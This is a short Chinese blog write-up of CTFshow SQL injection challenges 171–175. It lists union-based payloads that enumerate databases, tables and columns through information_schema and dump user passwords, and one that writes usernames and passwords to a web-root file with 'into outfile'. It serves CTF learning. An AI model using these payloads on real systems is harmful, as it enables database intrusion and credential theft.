SQL注入-无过滤注入

SQL无过滤注入CTFshow171-175

1
2
3
4
5
6
7
8
9
1' or 1=1 union select 1,database() --+寻找当前库名
1' or 1=1 union select group_concat(schema_name) from information_schema.schemata--+寻找所有库名

1' or 1=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+寻找表名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web '--+寻找列名

-1' union select 1,2,group_concat(password) from ctfshow_user2--+寻找flag

注意:

  • group_concat()将查询结果打包在一起返回,便于观察
  • –+表示将之后的内容注释掉,以及其他一些方式注释掉之后内容
  • 使用union select需要让前边语句结果为假(-1’),或者添加’1=1’

例题:

CTFShow174:

alt text

CTFShow175:

‘ union select username, password from ctfshow_user5 into outfile ‘/var/www/html/flag.txt’ –+


SQL注入-无过滤注入
https://43.242.201.154/2024/09/01/sqlinjection1/
Author
Dong
Posted on
September 1, 2024
Licensed under